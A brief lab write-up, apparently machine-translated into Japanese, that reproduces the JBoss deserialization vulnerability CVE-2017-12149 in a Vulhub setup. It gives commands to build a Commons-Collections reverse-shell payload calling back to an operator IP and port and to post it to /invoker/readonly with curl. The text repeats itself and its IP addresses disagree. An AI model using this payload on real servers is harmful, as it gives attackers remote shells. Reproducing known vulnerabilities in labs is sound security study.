【Vulhub】CVE-2017-12149 JBOSSアンチシーケンス化脆弱性再現
3147 ワード
環境
ターゲット(Kali):http://192.168.0.11:8080/
オペレータ(Paroot):192.168.0.131
プロセス
POCのダウンロード:https://github.com/joaomatosf/JavaDeserH2HC
POCの使用方法:
いくつかの警告があったようですが、まだ使えます.
操作およびリスニングの開始
ターゲットにpayloadを送信
リバウンド成功shell
参考資料
http://www.mianhuage.com/695.html
ターゲット(Kali):http://192.168.0.11:8080/
オペレータ(Paroot):192.168.0.131
プロセス
POCのダウンロード:https://github.com/joaomatosf/JavaDeserH2HC
POCの使用方法:
payload :
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
# shell ip
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.135.100:1234 (IP: )
curl payload:
curl http://192.168.135.4:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
いくつかの警告があったようですが、まだ使えます.
操作およびリスニングの開始
ターゲットにpayloadを送信
リバウンド成功shell
参考資料
http://www.mianhuage.com/695.html